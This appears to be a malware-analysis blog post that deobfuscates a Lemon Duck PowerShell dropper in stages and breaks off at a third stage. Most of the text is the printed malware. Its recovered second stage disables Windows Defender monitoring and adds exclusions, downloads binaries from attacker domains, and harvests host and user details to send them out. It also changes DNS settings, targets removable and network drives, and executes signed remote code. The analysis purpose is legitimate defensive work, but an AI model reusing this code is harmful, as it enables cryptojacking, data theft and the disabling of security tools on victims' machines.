argE2ImZ+ImZF'+' tsoh-etirw
{)arg'+'E2F(ptImZ+ImZs noiImZ+ImZtcnuf
pmt:vneE2F noitImZ'+'+ImZacol-tes
AGJ&AGJnioj-)camE2F,dImZ+'+'ImZiugE2F,eman_pmocE2F,vE2F(@='+'smarapE2F
]1[)AGJ?AGJ(tilps.lruE2F=vE2F
}1=asiE2F{))AGJDMAndWnoedaRAGJ hctam- dracE2F((fi
}1=nsiE2F{))AGJECROFEGndWAIDIVNndWXTGAGJImZ+ImZ hctam- '+'d'+'racE2F((f'+'i
ImZ+ImZ
}{hctac'+'}ImZ+ImZ
emanImZ+ImZerE2FE5q0.1vE5qllehSrImZ+ImZewoPswodniWEImZ+ImZ5q23metsysE5qswodni'+'wE5q:c ssecorPnoisulcxE- ecnereferPpImZ+ImZM-ddA
ImZ+ImZexe.llehsrewoImZ+ImZpE5q0.1vE5qImZ+ImZllehSrewoPswodniWE5q23metsysE5qswodniwE5q:c ssecorPnoImZ+ImZisulcxE- ecnereferPpM-ddA
E5q:c htaPnoisulcxE- ecneref'+'erPpM-ddA
1 gnirotinoMemitlaeImZ+ImZRelbasiD- ecnerImZ+ImZeferPpM-teS
{yrt
}{hctac})'+'D2E,D2E(nioj-latoImZ+ImZt.etarhsah.jboE2F=rhmE2FIm'+'Z+Im'+'Z
ImZ+ImZ
pi.n'+'oi'+'tcennoc.jboE2F=pimE2F
no'+'isrev.jboE2F=vmE2F
))D2'+'Eyrammus/1/96634:1.0.0.721//:ptt'+'hD2E(AGJImZ+ImZgnirtsdao'+'lnwodAGJ.)tneilx0dcbew.ten tcex0djbo-ImZ+ImZwx0den((tcejbOezilaireseD.)rezilaireStpircSavaJ.noitazilaireS.tpircS.beW tcejbO-weN( = jboE2F
)AGJsIm'+'Z+ImZno'+'isnetxE.beW.metsySAGJ(emaNlaitImZ+ImZraPhtiWdaoL::]ylbm'+'essA.noitcelfeR['+'
{yrt
}{h'+'ctac}AGJn'+'dWAGJnioj-)}]0[))(gnirtso'+'t.epyTeviImZ+ImZrD._E2F(ImZ+ImZ+AGJ_AGJ+]0[)emaN._E2F({hcaerof ndW }))AGJ23TAFAGJ qe'+'- tamroFevirD._E2F( ro- )AGJSFTNAGJ'+' qe- tamroFevirD._E'+'2F(( dna- ))AGJkrowteN'+'AGJ qe'+'- epyTevirD._E2F( '+'ro- )AGJelbavomeRAGJ qeImZ+I'+'mZ- epyTevirD._E2'+'F(( dna'+'- )4201 tg- ecapSeerFelbaliavA._E2'+'F( dna- ydaeRsI._E2F{ erehw ndWImZ+ImZ )ImZ+ImZ(sevirDteG::'+']ofnIevirD.OI.metsys[( = evi'+'rdE2F
{yrt
bG1/musImZ+ImZmE2F=memE2F;} yticapaC._E2F =+ musmE2F { }0 = musmE2F{\% ndW yromeMImZ+ImZlacisyhP'+'_23niW imwg
AGJ)egatnecre'+'PdaoL.)rossecoImZ+ImZrP_23niW ssalCImZ+ImZ- ImZ+ImZtcejbOimW-teG((E2FAGJ = rep_'+'u'+'pcE2F
eman.)rellortnoCoediV_23'+'niW tcejbOimW-teG( = dracE2F
eman.)ro'+'ssecorp_23niwImZ+ImZ tcejboimw-teg( = emanup'+'cE2F
}sdnoceslatot._'+'E2F{hcaerofndW)tnuoCkciT::]tnemnorivne[(sd'+'nocesilliMmo'+'rF::]napsemit[ = emitpuE2F
nia'+'moD.)'+'meImZ+ImZtsysreImZ+Im'+'Ztupmoc_23niw'+' '+'tImZ+ImZcejbOimW-teG( = niamodE2FImZ'+'+ImZ
EMANRESU:'+'vneE2F = resuE2F
noisreV.bsoE2F+AGJ_AGJ+)AGImZ+ImZJAGJ,'+'AGJ swodni'+'W '+'tfosorciMA'+'GImZ+ImZJ(ecalper.noitp'+'aC.bso'+'E2F = soE2F
)metsySgnitarepO_'+'23niW ssalc- t'+'cejbOiImZ+ImZm'+'W-teG( = bsoE2'+'ImZ+ImZF
1 tImZ+ImZsrif- tcejbo-tceles ndW sserddacaM.)}eurtE2F QE- delbanepi._E2F{ erehw ndW noImZ+ImZitaImZ+ImZrugifnoCretpa'+'dAkrowteN_23niW tcejbOim'+'W-teG( = camE2F
DI'+'UU.)tcudorPmImZ+ImZetsySretupmoC_23n'+'iW tcejboimw-t'+'eg( = diugE2F
EMANRETUPMOC:vneE2'+'F = eman_pmocE2F
)AGJrotartsinimdAA'+'GJ ]ImZ+ImZeloRnItliuBswodniImZ+ImZW.lapicnirP.ytir'+'uceS[(eloRnIsI.'+'))(tnerImZ+ImZruCteG::]ytitnedIswodniW.lapicnir'+'ImZ+ImZP.ytiruceS[]'+'lapicnirPswodniW.lapicnirP.ytiruceS'+'[( = timrepE2F
AGJ/A'+'GJnioj-]'+'2..0[)AGJ/A'+'GJ(tilps.lruE'+'2F = lru_erocE2F
}AGJmoc.9u3'+'bb.t//:ptthAGJ=lruE2F{)lr'+'uE2F!(fi
AGJmocImZ+ImZ.uImZ+ImZdjw87u.d//:ptthAGJ = lru_nwodE2F
'+'
'+'
}{hctac}))AGJnibrkE2FE5qpmImZ+ImZt:vImZ+ImZnImZ+ImZeE2FAGJ(seImZ+ImZtyBl'+'ImZ+ImZlAdaeR::]eliF.OI[( ImZ+ImZ5dmg=5dmrklE2F{yrt
}{hctac}))AGJnibmE2'+'FE5qpmt:vneE2FAGJ(s'+'etyBllAdaeR::'+']eliF.OI[( 5dmg=5dmmlE2ImZ+ImZF'+'{yrt
}{hctac}))AGJnibfiE2FE5qpmt:vneE2FAGJ(setyBllAdaeR::]eliF.OI[( 5dmg=5dmfilE2F{yrt
AGJAGJ,AGJAGJ,AGJAGJ'+'=5dmrklEImZ+ImZ2F,5dmmlE2F,5dmfilE2F
emanrteg=emanerE2F
}
e'+'maneE2F ImZ+ImZnruter
}AGJexe.llehsrewImZ+ImZopAImZ+ImZGJ=emaneE2F{))AGJemaneE2FE5qhtaprE2FAGJImZ+ImZ hta'+'p-tset(!(fi
llun-tuondWA'+'GJemaneE2FE5qhtaprE2FA'+'GJ AGJe'+'xe.llI'+'mZ+ImZehsrewopE5qhtaprImZ+ImZ'+'E2FAGJ meti-y'+'poc
AGJexe.AGJ + '+'))'+'6%)modnaR-teG(+6( tnu'+'oC- modnaR-ImZ+ImZteGndW)2ImZ+ImZ21..79+09..56+75..84(]][rahc[(n'+'ioj-=emaneE2F
}
}
ImZ+ImZemaneImZ+ImZE2F nruter ImZ+I'+'mZ
{)_'+'5dmE2'+'F '+'qe- 5dmtE2F(fi
))AGJemaneE2FE5'+'qhtaprE2'+'FA'+'GJ(setyBllAdaeR::]eliF.OI[( 5dImZ+ImZmg=_5dmE2F ImZ+ImZ
{)semaneE2F ni emaneE2F(hcaerof ImZ+ImZ
))AGJexe.lle'+'hsrewopE5qh'+'taprE2FAGJ(setyBllA'+'daeR::]eliF.OI[( 5dmg = 5ImZ+I'+'mZdmtE2F
}eman._E2F{hcaerofndWexe.llehsrewop edulcxE- exe.'+'* edulcnI- A'+'GJ*E5qhtaprE2FAGJ icg = semaneE2F
AGJ0.1VE5qllehsrewopswodniWE5q23metsyImZ+ImZSE5qswodniWE5q:CAGJ=h'+'taprE2F
{)(emanrteg noitcnuf
}
lE2F nruter ImZ+ImZ
})D2E2xD2E(gnirtSoT._E2F=+lE2F{hcaerofndW)dE2F(hsaHetupmoC.)(etaerC::]5D'+'M.ImZ+ImZyhpargotpyrC.ytiruceS[ '+'
{)dE2F(5dmg noitcnuf
}
'+'AGJ31869c5772bc25ea69e32292a97d0c62AGJ=5dmgmE2F
AGJnib.g6mAGJ=nibgmE'+'2F
AGJ3d9aa5ImZ+ImZ5c53e66d'+'dfae7021e100a09323AGJ=5dmmE2'+'F'+'
AGJnib.6mA'+'GJ=nibmE2F
{)46sImZ+ImZiE2F(fi
AGJ6aaa5cad88365817f16316647dfc1a7bA'+'GJ=5dmrkE2F
AGJnib.rkAGJ=nibrkE2F
AG'+'Jf6eff1a9dd5e47ImZ+ImZ0f343207213dImZ+ImZdf9f40AGJ=5dmfiE2F
AGJnib.fiAGJ=nibfiE2F
)8 qe- ez'+'iS:ImZ+I'+'mZ:]rtPtnI[(]tni[=46siE2FImZ(( ( )'+'ImZI'+'mZNi'+'Oj-I'+'mZxImZ+]3,1[)eCnEREfERPesOBR'+'EvTwE]GnirTS[( (. '(( ( )'x'+]31[DILlehS$+]1[diLlEHs$ (&" ; [ARRay]::Reverse( $k8n3D) ; ( " $( sV 'ofS' '') " + [sTRing]( $k8n3D) +" $(set-variAbLe 'Ofs' ' ' )")
This seems to be obsfucated code.
So Let’s try to deobsfucate the script.
Stage 2
The payload we obatained is
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
( ((' .( ([STrinG]EwTvE'+'RBOsePREfEREnCe)[1,3]+ZmIxZm'+'I-jO'+'iNZm'+'IZmI'+') ( ((ZmIF2Eis64=[int]([IntPtr]:Zm'+'I+ZmI:Si'+'ze -eq 8)
F2Eifbin=JGAif.binJGA
F2Eifmd5=JGA04f9fdZmI+ZmId312702343f0ZmI+ZmI74e5dd9a1ffe6fJ'+'GA
F2Ekrbin=JGAkr.binJGA
F2Ekrmd5=JG'+'Ab7a1cfd74661361f71856388dac5aaa6JGA
if(F2EiZmI+ZmIs64){
F2Embin=JG'+'Am6.binJGA
'+'F'+'2Emmd5=JGA32390a001e1207eafd'+'d66e35c5ZmI+ZmI5aa9d3JGA
F2'+'Emgbin=JGAm6g.binJGA
F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA'+'
}
function gmd5(F2Ed){
'+'[Security.CryptographyZmI+ZmI.M'+'D5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}
ZmI+ZmIreturn F2El
}
function getrname(){
F2Erpat'+'h=JGAC:q5EWindowsq5ESZmI+ZmIystem32q5EWindowspowershellq5EV1.0JGA
F2Eenames = gci JGAF2Erpathq5E*JG'+'A -Include *'+'.exe -Exclude powershell.exeWdnforeach{F2E_.name}
F2EtmdZm'+'I+ZmI5 = gmd5 ([IO.File]::Read'+'AllBytes(JGAF2Erpat'+'hq5Epowersh'+'ell.exeJGA))
ZmI+ZmI foreach(F2Eename in F2Eenames){
ZmI+ZmI F2Emd5_=gmZmI+ZmId5 ([IO.File]::ReadAllBytes(JG'+'AF'+'2Erpathq'+'5EF2EenameJGA))
if(F2Etmd5 -eq'+' F'+'2Emd5'+'_){
Zm'+'I+ZmI return F2EZmI+ZmIenameZmI+ZmI
}
}
F2Eename=-joi'+'n([char[]](48..57+65..90+97..12ZmI+ZmI2)WdnGetZmI+ZmI-Random -Co'+'unt (6+(Get-Random)%6'+'))'+' + JGA.exeJGA
cop'+'y-item JGAF2E'+'ZmI+ZmIrpathq5EpowersheZmI+Zm'+'Ill.ex'+'eJGA JG'+'AF2Erpathq5EF2EenameJG'+'AWdnout-null
if(!(test-p'+'ath ZmI+ZmIJGAF2Erpathq5EF2EenameJGA)){F2Eename=JGZmI+ZmIApoZmI+ZmIwershell.exeJGA}
returnZmI+ZmI F2Eenam'+'e
}
F2Erename=getrname
F2Elifmd5,F2Elmmd5,F2ZmI+ZmIElkrmd5='+'JGAJGA,JGAJGA,JGAJGA
try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}
try{'+'FZmI+ZmI2Elmmd5=gmd5 ([IO.File]'+'::ReadAllByte'+'s(JGAF2Eenv:tmpq5EF'+'2EmbinJGA))}catch{}
try{F2Elkrmd5=gmd5ZmI+ZmI ([IO.File]::ReadAlZmI+ZmI'+'lBytZmI+ZmIes(JGAF2EeZmI+ZmInZmI+ZmIv:tZmI+ZmImpq5EF2EkrbinJGA))}catch{}
'+'
'+'
F2Edown_url = JGAhttp://d.u78wjdZmI+ZmIu.ZmI+ZmIcomJGA
if(!F2Eu'+'rl){F2Eurl=JGAhttp://t.bb'+'3u9.comJGA}
F2Ecore_url = F2'+'Eurl.split(JG'+'A/JGA)[0..2'+']-joinJG'+'A/JGA
F2Epermit = (['+'Security.Principal.WindowsPrincipal'+'][Security.PZmI+ZmI'+'rincipal.WindowsIdentity]::GetCurZmI+ZmIrent())'+'.IsInRole([Secu'+'rity.Principal.WZmI+ZmIindowsBuiltInRoleZmI+ZmI] JG'+'AAdministratorJGA)
F2Ecomp_name = F'+'2Eenv:COMPUTERNAME
F2Eguid = (ge'+'t-wmiobject Wi'+'n32_ComputerSysteZmI+ZmImProduct).UU'+'ID
F2Emac = (Get-W'+'miObject Win32_NetworkAd'+'apterConfigurZmI+ZmIatiZmI+ZmIon Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firsZmI+ZmIt 1
FZmI+ZmI'+'2Eosb = (Get-W'+'mZmI+ZmIiObjec'+'t -class Win32'+'_OperatingSystem)
F2Eos = F2E'+'osb.Ca'+'ption.replace(JZmI+ZmIG'+'AMicrosoft'+' W'+'indows JGA'+',JGAJZmI+ZmIGA)+JGA_JGA+F2Eosb.Version
F2Euser = F2Eenv'+':USERNAME
ZmI+'+'ZmIF2Edomain = (Get-WmiObjecZmI+ZmIt'+' '+'win32_computZ'+'mI+ZmIersystZmI+ZmIem'+').Dom'+'ain
F2Euptime = [timespan]::Fr'+'omMillisecon'+'ds([environment]::TickCount)Wdnforeach{F2E'+'_.totalseconds}
F2Ec'+'puname = (get-wmiobject ZmI+ZmIwin32_process'+'or).name
F2Ecard = (Get-WmiObject Win'+'32_VideoController).name
F2Ecp'+'u'+'_per = JGAF2E((Get-WmiObjectZmI+ZmI -ZmI+ZmIClass Win32_PrZmI+ZmIocessor).LoadP'+'ercentage)JGA
gwmi Win32_'+'PhysicalZmI+ZmIMemory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2EmZmI+ZmIsum/1Gb
try{
F2Edr'+'ive = ([system.IO.DriveInfo]'+'::GetDrives(ZmI+ZmI) ZmI+ZmIWdn where {F2E_.IsReady -and (F'+'2E_.AvailableFreeSpace -gt 1024) -'+'and ((F'+'2E_.DriveType -Zm'+'I+ZmIeq JGARemovableJGA) -or'+' (F2E_.DriveType -'+'eq JGA'+'NetworkJGA)) -and ((F2'+'E_.DriveFormat -eq '+'JGANTFSJGA) -or (F2E_.DriveFormat -'+'eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+ZmI+ZmI(F2E_.DrZmI+ZmIiveType.t'+'ostring())[0]})-joinJGAWd'+'nJGA}catc'+'h{}
try{
'+'[Reflection.Asse'+'mbly]::LoadWithParZmI+ZmItialName(JGASystem.Web.Extensi'+'onZmI+Z'+'mIsJGA)
F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xwZmI+ZmI-objd0xect net.webcd0xlient).JGAdownl'+'oadstringZmI+ZmIJGA(E2Dh'+'ttp://127.0.0.1:43669/1/summaryE'+'2D))
F2Emv=F2Eobj.versi'+'on
F2Emip=F2Eobj.connect'+'io'+'n.ip
ZmI+ZmI
Z'+'mI+Z'+'mIF2Emhr=F2Eobj.hashrate.tZmI+ZmIotal-join(E2D,E2D'+')}catch{}
try{
Set-MpPrefeZmI+ZmIrence -DisableRZmI+ZmIealtimeMonitoring 1
Add-MpPre'+'ference -ExclusionPath c:q5E
Add-MpPreference -ExclusiZmI+ZmIonProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShellZmI+ZmIq5Ev1.0q5EpZmI+ZmIowershell.exeZmI+ZmI
Add-MZmI+ZmIpPreference -ExclusionProcess c:q5Ew'+'indowsq5Esystem32q5ZmI+ZmIEWindowsPoweZmI+ZmIrShellq5Ev1.0q5EF2EreZmI+ZmIname
ZmI+ZmI}'+'catch{}
ZmI+ZmI
i'+'f((F2Ecar'+'d'+' -match ZmI+ZmIJGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}
if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}
F2Ev=F2Eurl.split(JGA?JGA)[1]
F2Eparams'+'=@(F2Ev,F2Ecomp_name,F2EguiZmI'+'+ZmId,F2Emac)-joinJGA&JGA
set-locaZmI+'+'ZmItion F2Eenv:tmp
functZmI+ZmIion sZmI+ZmItp(F2E'+'gra){
write-host '+'FZmI+ZmI2Egra
Start-Process -File'+'Path cmd.exe -ArgumentLi'+'st JGA/c F2EgraJGA
}
function gcf(F2ZmI+Zm'+'IEcode,F2Emd,F2Efn){
('+'E'+'2Decho E2D+F2Ecode+E2'+'D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2'+'Eenv:tmp+EZmI+ZmI2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url=ZmI+ZmIE2DE2DEZmI+ZmI2D+F2EdowZmI+'+'ZmIn_url+E2DE2'+'DE2DZmI+ZmI;function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(F2EZmI+ZmIcon)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};r'+'eturn F2ZmI+ZmIEs}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp)'+';F2Emd'+'5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup'+'=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect NetZm'+'I+ZmI.WebCd0xlient).downloaddata(ZmI+ZmIF2Edown_u'+'rl+E2DZ'+'mI+ZmIE2D/E2D+F2Efn+E2D?E2D+F2Epara'+'ms'+'+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et'+'-eqF2Eifmd5){[System'+'.IO.Fil'+'e]::WriteAZmI+ZmIllBytes(F2Eifp,F2Econ)}elZmI'+'+ZmIse{F2Enoup=1}ZmI+ZmI}if(ZmI'+'+Z'+'mIF2Enoup){F2Econ=F2Eco'+'n_;F2Eifmd5=F2Emd5_}E2D).replace(E2DW'+'dnE2D,E2D^^^WdnE2D).replac'+'e(E2D&E2D,E2D^^^&E2DZmI+ZmI'+')
}
function gpa(F2Efnam,F'+'2Ename){
(E2Dfor(F2EiZmI+'+'ZmI=0;F2Ei -lt F2Econ.co'+'untZmI+Zm'+'I-1;F2Ei+=1){if(F2E'+'con[F2Ei] -eq '+'0x0'+'a){breaZmI+ZmIk}};id0xex(-join[char[]]'+'F2Ec'+'on[0..F2Ei]);F2Ebin=(NewZmI+ZmI-Object IO.B'+'inaryReader(New-Object System.IO.CoZmI+ZmImpression'+'.GzipStream (New-ObZmI+ZmIje'+'ct System.IO.MemoryS'+'tream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), Zm'+'I+ZmI([IO.Compr'+'ession.CompressionMode]::Decompress))).ReadBytes(10000000)ZmI+ZmI;F2Ebin_=F2Ebin.Clone();F2Emep=F2Een'+'v:tmp+ZmI+ZmIE2DE2DE2D+JGAZmI+ZmIq5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::Wr'+'iteAllByt'+'es(F2Emep,F2Ebin_+(('+'1..127)WdnGet-Random -Count 100));test1'+' -PEBytes F2EbinE2D'+').replace(E2DWdnE2D,E2D^^^WdnE2D'+')'+'.re'+'place(E2D&ZmI+ZmIE2D'+',E2D^^^&E2D)+JGAWdnFZmI+ZmI2Ename - &cmd /c copy /y %tmpZmI+ZmI%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA
}
'+'funcZmI+ZmItion gpb(F2EnameZ'+'mI+ZmI){
'+' E2DId0'+'xEX(-join[char[]]F2Econ)W'+'dnE2D+F2Ename'+'+E2D -E2D
}
function gcode(F2Efl) '+'{
E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Efl'+'ase;N'+'ew-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocal'+'E2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+'+'E2D)}catch{}E2D
}
F2E'+'ZmI+ZmIcode1'+'=gcode JGAIfJGA
Id0xEx F2Ecode1
if(F2ElocalIf){
stZmI+ZmIp ((gcf F2Ecode1 F2EifmdZmI+ZmI5 F2Eifbin)+(gpb F2Erename))
}
i'+'f(F2Eis64){
F2EZmI+ZmIc'+'ZmI+ZmIode2=gcode JGATMnJGA
Id0xEx F2Ecode2
ifZm'+'I+ZmI(F2'+'ElocalTMn){
stp ((gcf F2Ecode2 F2Em'+'mZmI+ZmId5 F2Embin)+(g'+'p'+'a F2Embin'+' F2E'+'rename))
'+'}
}
'+'if((F2Eisn -or F2Eisa) -and F2Eis64){
'+'
F2Ecode3=gcode JGATMngJGZmI+ZmIA
Id0xEx F'+'2Ecode3
if(F2ElocalTMng){
stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emg'+'binZmI+ZmI F2Ere'+'name))
}
}
F2Ecode4=gcod'+'ZmI+ZmIe JGAKrJGA
Id0xE'+'x F2Ecode4
if'+'(F2El'+'ocalK'+'r){
stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb ZmI+ZmIF2Erename))
}
stp (ZmI+ZmIE2Decho try{F2E'+'s=[System.NeZ'+'mI+ZmIt'+'.Sockets'+'.TcpListener]65529;'+'F2Es.start();while(1){}}catch{}Wd'+'nE2D+F2ErenZmI+ZmIame+E2D -E2D)
F2E'+'conf_f=test-pa'+'th c:q5Ewindowsq5Esystem32q5EWindowsPowerShZmI+ZmIellq5Ev1.0q5EconfiZmI+ZmIgXXX1'+'.'+'json
F2'+'Elmip=[System'+'.Net.Dns]::GetHo'+'stAddresses(JGAp.b69'+'kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }
F2Etpid,F2Etpna'+'me=(ge'+'ZmI+Z'+'mIt-ZmI+ZmIprocessWdnsort cpu -Des'+'cendinZmI+ZmI'+'gWdnselect-objectZmI+ZmI -first'+' 1WdnforeZmI+ZmIach{F2E_.id,FZmI+ZmI2E_.processnam'+'e})
F2Etcpconn = NetStat -anop'+' TCP
F2Eipport=JGAJGA
foreach(F2Et in F2Etcpconn){
F2Elin'+'e = F2Et.'+'sZmI+ZmIplit(E2D E2D)Wdn ? {F2E'+'_}
if'+' (F2ElineZ'+'mI+ZmI -eq FZmI+ZmI2Enull) '+'{ continue }
'+' if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2'+'Etpid)){
F2Eipport = F2Eline[2]
break'+'
}
}
try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder'+'(@(E2DZmI+ZmI8.8.8.8E2D,ZmI+ZmIE2'+'D'+'9.9'+'.9.9'+'E2D))}catch{}
F2EparZmI+ZmIams+=J'+'GA'+'&JGA+(@(FZmI+ZmI2Eos,[Int]F2Eis64,F2EZmI+ZmIuser,F2Edomain,F2EZmI+ZmIdrive,F2Ecpuname,F2Ec'+'ardZmI'+'+ZmI,F2Emem,F2Ecpu'+'_per,[InZmI+ZmItZmI+ZmI]F2Epermi'+'t,(ZmI+ZmIF2Elifmd5ZmI+ZmI[0..5]'+'-joZmI+ZmIinJGAJGA),(F2Elmmd5[ZmI+ZmI0..5]-joinJGAJGA),(F2Elk'+'rmdZmI+ZmI5[0..ZmI+ZmI5]-joinJGAJGA),F2ZmI+ZmIEmv,F2Emip,F2EmhrZmI+ZmI,F2EuptimZmI+Z'+'mIe,[Int]F2'+'Ec'+'onf_f,F2Elmip,F2EtpnaZmI+ZmIme,F2Eip'+'port,JGA0.9JGA)-joinJGA&JGA)
function SIEX {
Param(
[string]F2Eurl
)
try{
F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient
F2Efinalurl ='+' JGAF2EurlJGA+JGA?JGA+JGAF2Eparam'+'sJGA
ZmI+ZmItry{
F2EwebclientZmI+ZmI.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.reZmI+ZmIplace(E2DZmI+ZmIq5EE2D,E2D-E2'+'D))
} catch{}
F2Eres_bytes = F2Ewebclient.DownloadData(ZmI+ZmIF2Efinalurl)
if(F2Eres_bytes.count -gt 173){
F2Esign_bytes = F2EresZmI+ZmI_bytes[0..171];
ZmI+Zm'+'IF2Eraw_byteZmI+ZmIs = F2Eres_bytes'+'[173..F2Eres_bytes.count];
'+'F2ZmI'+'+ZmIErsaParams'+' ='+' New-Object System.Security.C'+'rypt'+'ographZm'+'I+ZmIy.RSAParameters
F2Er'+'sa'+'Params.Modulus = '+'0xda,0x65,0xa8,0xdZmI+ZmI7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,Z'+'mI+ZmI0'+'xff,0x'+'2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,'+'0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,'+'0xcd,'+'0x37,0x6b,0xf3,0'+'x4f,0x3b,0x62,0x70,0x86,0x07'+',0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xd'+'c,0x88,0xbf,0x35,0xf2,0x92,0xee'+',0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xZmI+ZmId1,0x'+'19,0x'+'30,0x73,0xc6,0x52,0x01,0xcd,0'+'xe7,0xc7,0xZmI+ZmI34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0'+'xcd,0x79,0x40,0xa7,0x91,0x6a,0x'+'ae,0x95,0'+'x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a'+',0x98,0xdb,0x97,0x3f,0xf6ZmI+ZmI,0x2e,0x95,0x10,0x'+'72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xZmI+ZmIea,0x38,0xb7,0x47,0x6b,0x5d
F2ErZmI+ZmIsaParams'+'.ExponZmI+ZmIent = 0x01,0x00,0x01
F2ErsZmI+ZmIa = New-Object -TyZmI+ZmIpeName System.Security.Cryptography.RSACryptoS'+'erviceProvider;
F2Ersa.ImportPZmI+ZmIarameters(F2'+'ErsaParams)
'+'
FZm'+'I+ZmI2EbasZmI+ZmIe64 = -join([cha'+'r[]]F2EZmI+ZmIsign_bytes)
F2EbyteArray = [convert]::FromBase64Stri'+'ng(F'+'2Ebase64)
F2Esha1 = New-Object Sys'+'t'+'ZmI+ZmIem.SecuZmI+ZmIrity.Cryptography.SH'+'A1CryptoServi'+'ceProvider
if(F2Ersa.verifyData(F'+'2'+'Eraw_bytes,F2Esha1,F2EbyteArray)) {
IZmI'+'+ZmIEX (-jo'+'in[char[]]F2Eraw_bytes)
}
}
} c'+'atch{}
}
StartZmI+ZmI-Sleep -Seconds 3
SIEX JGAF2Ecore_url/report.jspJGA
Zm'+'I)-rEplAcE ([cHaR]87+[cHaR]100+'+'[cHaR]110),[cHaR]124 -rEplAcEZmIE2DZmI,[cHaR]39 -r'+'EplAcE ([cHaR]70+[cHaR]50+'+'[cHaR]69),[cHaR]36-c'+'rEPLAcE([cHaR]100+[cHaR]4'+'8+[cHaR'+']12'+'0),[cHaR]96-crEPLAcEZmIJGAZmI,'+'[cHaR]34 -rEplAcE ([cHa'+'R]113+[cHaR]'+'53+[cHaR]69),[cHaR]92) )
') -CRePlACE 'ZmI',[chaR]39 -repLACE 'EwT',[chaR]36))
We got some familiar looking code but still its obfuscated, so lets deobsfucate the code again.
Stage 3
The deobsfucated Code we got with us is ⬇️ this,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
